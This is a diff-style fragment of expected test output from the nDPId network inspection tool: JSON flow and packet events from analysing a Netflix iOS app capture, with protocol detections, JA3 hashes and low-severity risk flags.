+00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1275,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1484319056313,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056313,"pkt":"gCqoTGHM5JjWH70UCABFAAA0DEJAAEAGSVDAqAEHF\/YLjc+8AFAt4\/K4FWJh54AQEBVvgQAAAQEICh9lENgQPWmI"} +01133{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1277,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056241,"flow_last_seen":1484319056314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1484319056314,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53180,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJ5yTLBCkGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_3mCFrUjHWqh5ipQCtzf4OVWQ&v=3&e=1484347850&t=r5jtnnEcR8hDCkPImfEiWqWAjKk&random=1846234524","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1279,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1484319056326,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056326,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz72N4Tx+gHq67aAS\/\/8YZwAAAgQFtAEDAwkEAggKc9HQqh9lEJ4="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1280,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1484319056326,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056326,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz749DprObTkJu6AS\/\/9Z3AAAAgQFtAEDAwkEAggKxO\/1DB9lEJ4="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1282,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1484319056327,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056327,"pkt":"gCqoTGHM5JjWH70UCABFAAA0BrtAAEAGTtfAqAEHF\/YLjc+9AFCAerrtjeE8f4AQEBU20gAAAQEICh9lEOxz0dCq"} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1283,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1484319056327,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056327,"pkt":"gCqoTGHM5JjWH70UCABFAAA0Fj1AAEAGP1XAqAEHF\/YLjc++AFBtOQm7PQ6az4AQEBV4RwAAAQEICh9lEOzE7\/UM"} +01132{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1285,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056264,"flow_last_seen":1484319056336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":359,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056336,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53181,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQLJ2TIBepGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpPbiCFrUjHWqh5ipQCtzf4OVWQ&v=3&e=1484347850&t=tTXu3c6FnJtfi6z0IJp3hw8eDv8&random=129454076","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1286,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056264,"flow_last_seen":1484319056347,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056347,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53182,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJZ2VKhqgGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzTho_flHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=LQ7LyXSnZaXKEHAHaRRHk-S7dKE&random=4209810633","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1907,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064590,"flow_last_seen":1484319064590,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319064590,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53183,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1907,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1484319064590,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319064590,"pkt":"gCqoTGHM5JjWH70UCABFAABAVptAAEAGBuzAqAEHF\/YDjM+\/AFBrAzOSAAAAALAC\/\/+cMAAAAgQFtAEDAwUBAQgKH2UvkQAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1909,"source":"netflix.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064593,"flow_last_seen":1484319064593,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319064593,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1909,"source":"netflix.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1484319064593,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319064593,"pkt":"gCqoTGHM5JjWH70UCABFAABAVrtAAEAG\/srAqAEHF\/YLjc\/AAFDz13keAAAAALAC\/\/\/FywAAAgQFtAEDAwUBAQgKH2UvkwAAAAAEAgAA"} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1911,"source":"netflix.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1484319064620,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319064620,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz8BQi7Oi89d5H6AS\/\/+uwwAAAgQFtAEDAwkEAggKYvDA2R9lL5M="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1912,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1484319064620,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319064620,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADgGZWsX9gOMwKgBBwBQz78\/hnHMawMzk6AS\/\/+duQAAAgQFtAEDAwkEAggKbx\/u9B9lL5E="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1913,"source":"netflix.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1484319064621,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319064621,"pkt":"gCqoTGHM5JjWH70UCABFAAA0SOFAAEAGDLHAqAEHF\/YLjc\/AAFDz13kfUIuzo4AQEBXNXwAAAQEICh9lL7Bi8MDZ"} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1914,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1484319064621,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319064621,"pkt":"gCqoTGHM5JjWH70UCABFAAA0y1dAAEAGkjvAqAEHF\/YDjM+\/AFBrAzOTP4ZxzYAQEBW8UwAAAQEICh9lL7BvH+70"} +01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1916,"source":"netflix.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064593,"flow_last_seen":1484319064624,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":509,"flow_tot_l4_payload_len":509,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1484319064624,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53184,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/?o=AQEfKq2oMrLRiWL2puNQJJqTIRqhGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_vlHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=TnP59JB1wb5UTOCr0m-KQU2kGPo","code":0,"content_type":"","user_agent":"AppleCoreMedia\/1.0.0.14C92 (iPhone; U; CPU OS 10_2 like Mac OS X; en_us)"}} +01153{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1917,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064590,"flow_last_seen":1484319064634,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":505,"flow_tot_l4_payload_len":505,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1484319064634,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53183,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.3.140","url":"23.246.3.140\/?o=AQEfKq2oMrLRiWL-p-VeIZ6WKRq-X6LMvaLqgxWBCuFbh09MpreORUUOO5Tx1683HPnLY6BPjN_9mlDuYihGZoXu9u0ozH8RFioBN_JDNiRscidjvoSdWmlyZgPNansW0lkBr4X81HvloOi8BS_exVSPhMyJQTB5bg&v=3&e=1484347850&t=-8u4vlcPuFqcOLnLyb9DDtK-bB4","code":0,"content_type":"","user_agent":"AppleCoreMedia\/1.0.0.14C92 (iPhone; U; CPU OS 10_2 like Mac OS X; en_us)"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1921,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064669,"flow_last_seen":1484319064669,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319064669,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1921,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1484319064669,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319064669,"pkt":"gCqoTGHM5JjWH70UCABFAABAhwJAAEAGqhTAqAEHNr8RM8\/JAbsptVYdAAAAALAC\/\/+MwgAAAgQFtAEDAwUBAQgKH2Uv3QAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1922,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064671,"flow_last_seen":1484319064671,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319064671,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1922,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1484319064671,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319064671,"pkt":"gCqoTGHM5JjWH70UCABFAABAbOBAAEAGxDbAqAEHNr8RM8\/SAbtTxg2UAAAAALAC\/\/+rMAAAAgQFtAEDAwUBAQgKH2Uv3gAAAAAEAgAA"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1925,"source":"netflix.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064683,"flow_last_seen":1484319064683,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1484319064683,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":60962,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1925,"source":"netflix.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1484319064683,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"thread_ts_msec":1484319064683,"pkt":"gCqoTGHM5JjWH70UCABFAABFcJ0AAP8Rx7HAqAEHwKgBAe4iADUAMSObED0BAAABAAAAAAAAB2ljaG5hZWEDZ2VvB25ldGZsaXgDY29tAAABAAE="} 00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1925,"source":"netflix.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064683,"flow_last_seen":1484319064683,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1484319064683,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":60962,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ichnaea.geo.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1930,"source":"netflix.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1484319064699,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":248,"pkt_l4_len":214,"thread_ts_msec":1484319064699,"pkt":"5JjWH70UgCqoTGHMCABFAADq4UlAAEAR1WDAqAEBwKgBBwA17iIA1plWED2BgAABAAkAAAAAB2ljaG5hZWEDZ2VvB25ldGZsaXgDY29tAAABAAHADAAFAAEAAAAMABkHaWNobmFlYQdsYXRlbmN5BnByb2RhYcAYwDUAAQABAAAAFgAENCUk\/MA1AAEAAQAAABYABDQrZhTANQABAAEAAAAWAAQ0Iv+pwDUAAQABAAAAFgAENBhu0sA1AAEAAQAAABYABDQK7rvANQABAAEAAAAWAAQ2RB9SwDUAAQABAAAAFgAENCdXJMA1AAEAAQAAABYABDQobnM="} 00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1930,"source":"netflix.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319064683,"flow_last_seen":1484319064699,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1484319064699,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":60962,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ichnaea.geo.netflix.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.37.36.252"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1935,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064711,"flow_last_seen":1484319064711,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319064711,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1935,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1484319064711,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319064711,"pkt":"gCqoTGHM5JjWH70UCABFAABAfOpAAEAGov3AqAEHNCUk\/M\/TAbvE99WSAAAAALAC\/\/9grAAAAgQFtAEDAwUBAQgKH2UwAgAAAAAEAgAA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1937,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1484319064722,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319064722,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGRvs2vxEzwKgBBwG7z9JcNkhzU8YNlaASOJDYrwAAAgQFtAQCCAqtilitH2Uv3gEDAwg="} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1938,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1484319064722,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319064722,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGR\/s2vxEzwKgBBwG7z8mqa43KKbVWHqASOJAmtQAAAgQFtAQCCAqtilitH2Uv3QEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1939,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1484319064723,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319064723,"pkt":"gCqoTGHM5JjWH70UCABFAAA06mxAAEAGRrbAqAEHNr8RM8\/SAbtTxg2VXDZIdIAQEBUvyAAAAQEICh9lMA6tilit"} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1940,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1484319064724,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319064724,"pkt":"gCqoTGHM5JjWH70UCABFAAA0RtdAAEAG6kvAqAEHNr8RM8\/JAbsptVYeqmuNy4AQEBV9zAAAAQEICh9lMA6tilit"} -00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1942,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064669,"flow_last_seen":1484319064728,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319064728,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1943,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064671,"flow_last_seen":1484319064729,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319064729,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1950,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1484319064781,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319064781,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGNcw0JST8wKgBBwG7z9NfgzodxPfVk6ASRersYQAAAgQFtAQCCAqFpSALH2UwAgEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1953,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1484319064782,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319064782,"pkt":"gCqoTGHM5JjWH70UCABFAAA0MmJAAEAG7ZHAqAEHNCUk\/M\/TAbvE99WTX4M6HoAQEBVQwAAAAQEICh9lMEaFpSAL"} -00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1957,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064711,"flow_last_seen":1484319064785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":229,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1484319064785,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 